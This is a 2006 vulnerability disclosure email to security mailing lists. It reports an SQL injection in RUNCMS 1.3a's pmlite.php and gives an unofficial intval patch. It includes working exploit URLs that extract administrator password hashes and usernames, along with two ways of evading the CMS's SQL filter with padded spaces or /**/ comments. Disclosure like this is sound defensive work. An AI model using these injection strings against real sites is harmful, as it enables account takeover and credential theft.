Date: Wed, 15 Feb 2006 21:00:15 -0800 (PST)
From: h e <het_ebadi@yahoo.com.>
Subject: RUNCMS 1.3a SQL injection
To: [email protected], [email protected],
[email protected],
"[email protected]" <content-editor@securityfocus.com.>,
"[email protected]" <editor@securityfocus.com.>,
"[email protected]" <expert@securiteam.com.>,
"[email protected]" <news-editor@securityfocus.com.>,
"[email protected]" <vuldb@securityfocus.com.>,
"[email protected]" <vuln@secunia.com.>,
"[email protected]" <webmaster@secunia.com.>,
"[email protected]" <webmaster@securityfocus.com.>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Virus-Scanned: antivirus-gw at tyumen.ru
refrence:
http://www.runcms.org/public/modules/forum/viewtopic.php?topic_id=4003&forum=18
http://hamid.ir/security/
-----------------------------------------------
RUNCMS 1.3a SQL injection
Runcms Includes most things a webmaster would expect
from a cms: downloads, links, tutorials section,
polls, forums, news,
faq, contact form, rss feeds, file uploads, blogging
via xml-rpc, & more. Possibility to manage users as
groups with module/block specific access permissions,
and extend functioality via 3rd party module plug-ins
and ...
Original Author: The Xoops Project
http://www.xoops.org
http://www.runcms.org
Credit:
The information has been provided by Hamid Ebadi
( Hamid Network Security Team): admin[AT]hamid[o]ir
The original article can be found at:
http://hamid.ir/security/
Vulnerable Systems:
tested on RUNCMS 1.3a and RUNCM 1.2 (and below ?)
Detail ::
Send Private Message
The following URL can be used to trigger an SQL
injection vulnerability in the pmlite.php [ but no
error will disply ! ]
http://localhost/modules/messages/pmlite.php?send=1&to_userid=-1[SQL
INJECTION]
http://localhost/modules/messages/pmlite.php?send=2&to_userid=-1
union select pass from runcms_users
internal RUNCMS protection will block this request and
redirect your browser to http://localhost/abuse.php
and you will see this warning:
" WARNING !!!!!! You were trying to abuse the
system, a logfile was created ..."
what is the problem ?
Bypassing Protection :
as i underestand RUNCMS just filter (union select)
and (union all select) and ....! but they forgot
(union select) !
exploit:
http://localhost/modules/messages/pmlite.php?send=2&to_userid=-1%20union%20%20%20%20select%20pass%20from%20runcms_users%20where%20level=5
there is another way to bypass runcms internal
protection simply add " /**/ " in your query
exploit will be something like this :
http://localhost/modules/messages/pmlite.php?send=2&to_userid=-1/**/union/**/select/**/uname/**/from/**/runcms_users%20where%20level=5/*hamid-network-security-team-http://hamid.ir
Unofficial Patch:
line 33 : pmlite.php
$to_userid = !empty($_POST['to_userid']) ?
$_POST['to_userid'] : $_GET['to_userid'];
// Hamid Ebadi (hamid Network Security Team): patch
for RUNCMS 1.3a and below .
$to_userid=intval($to_userid); //add this line plz
HAMID
$send = $_POST['send'];
Signature
__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
